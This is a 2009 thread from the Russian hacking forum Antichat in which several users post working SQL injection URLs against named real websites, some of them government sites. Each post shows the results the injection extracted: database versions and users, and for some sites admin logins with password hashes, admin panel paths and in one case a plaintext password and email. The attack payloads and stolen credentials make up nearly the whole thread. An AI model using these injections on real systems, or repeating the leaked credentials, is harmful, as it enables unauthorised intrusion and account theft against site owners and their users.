ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7921  
Старый 19.02.2009, 21:23
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

goxgo.ca - PR6
Код:
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
Админка:
Код:
http://www.goxgo.ca/admin/
Логин и пароль не знаем, поправим ситуацию:
Код:
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+FROM+user--
Вот уже есть логин и пасс:
krista_mckenna:4c1ccfb29d89aaa4746cf7dfb40a28ce
================================================== ==============================
findmespot.ca - PR4
Код:
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())/*
DB_User:webuser@localhost
DB:Web_SPOT_GCAN
DB_Ver:4.0.20-standard
Достаем пользователя из mysql.user
Код:
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user,password)+from+mysql.user/*
root:67c4db4730111611
и так далее =)

Извиняйте за боян maineservicecommission.gov... надо было быть повнимательнее и перепроверить =\

Последний раз редактировалось Kraneg; 19.02.2009 в 22:52..
 
Ответить с цитированием

  #7922  
Старый 19.02.2009, 23:12
Аватар для R3b
R3b
Новичок
Регистрация: 19.01.2009
Сообщений: 2
Провел на форуме:
7079

Репутация: 5
По умолчанию

Код:
http://www.ldk.gr/expertise.php?id=1++union+select+null,null,null,concat_ws(0x20,user(),database(),version()),null/*
ldk_gr@localhost ldk_gr 5.0.22-log
 
Ответить с цитированием

  #7923  
Старый 19.02.2009, 23:47
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://stefanboulter.com/single.php?id=-82+union+select+1,2,3,version(),5,6,7,8,9--
5.0.67-log
 
Ответить с цитированием

  #7924  
Старый 20.02.2009, 00:47
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://www.argued.ru
PR: 4
Тиц: 10
Версия: 5.0.67-log
База данных: u29980
Юзверь: u29980@10.10.153.164
Код:
http://www.argued.ru/news.php?id=-1%20union%20select%201,2,concat_ws(0x3a,LOGIN,PASSWORD),4,5,6,7,8,9,10,11,12%20from%20b_user%20--
Админка: http://argued.ru/admin/
Логин: andreygu
Пароль: e0067c761726972b3f473cdef6313fd9


Ох как клево через мою прогу все делать =)
 
Ответить с цитированием

  #7925  
Старый 20.02.2009, 00:59
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.phoenixnorthern.co.uk/display.php?pageid=5/**/UNION/**/SELECT/**/1,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21/*

phoenix@localhost

4.1.22
 
Ответить с цитированием

  #7926  
Старый 20.02.2009, 01:04
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

http://post.gov.bn/news_arc.php?newsid=10+union+select+1,version(),3, 4+limit+1,1/*

Version: 5.0.24a-standard-log
User: webadmin@192.168.1.206
Database: test

http://www.bridgeportct.gov/_admin/news_detail.php?newsID=258+union+select+1,2,versio n(),4,5+limit+1,1/*

Version: 5.0.41-community-nt-log
User:admin@localhost
Database: bridgeport

Последний раз редактировалось jokester; 20.02.2009 в 02:44.. Причина: congress.gov.ph БОЯН
 
Ответить с цитированием

  #7927  
Старый 20.02.2009, 02:18
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

ПР:4
Код:
http://www.wilsonelectronics.com/ViewProduct.php?ID=-123+union+select+1,2,3,4,concat(username,0x3a,userpwd),6,7,8,9,10,11,12,13,14,15,16,17,18+from+siteusers+--+
логин/пасс:
Код:
wilson:c23bde412afe8fd7cf234c9b4cb208a2
---------------------------------------------------------------------
The End!

Последний раз редактировалось jokester; 20.02.2009 в 02:47.. Причина: v-vid.ru и bestbets.org БОЯН
 
Ответить с цитированием

  #7928  
Старый 20.02.2009, 03:19
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://trovator.combios.es/temas/index.php?np=1&c=-188+union+seLECT+1,concat_ws(0x3a,ID,LOGIN,NAME,PA SSWORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 +from+PLD_USER--
логин - jsenyas: пароль - relevator: мыло - jose@combios.es

путь к админке по понятным причинам выкладывать не буду...кому надо - найдут и так
 
Ответить с цитированием

  #7929  
Старый 20.02.2009, 06:02
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Канал "Кинопоказ".

Код:
http://www.kinopokaz.tv/index.php?a=166+and+ascii(substring((select+1+from+site_userlist+limit+1),1,1))%3E1--
kinopokazeditor:4133e372138889e4ef3cb1ac01cb85ed
 
Ответить с цитированием

  #7930  
Старый 20.02.2009, 11:11
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.andonet.ro/Philips_Magic3VoicePPF571_1908+UNION+SELECT+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),dat abase(),user()),17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33+LIMIT+1,1.htm


Version : 5.0.51a-log
Database : andonet_ro_librarie
User : peterfi@192.168.88.1

Последний раз редактировалось Gorev; 20.02.2009 в 14:06..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ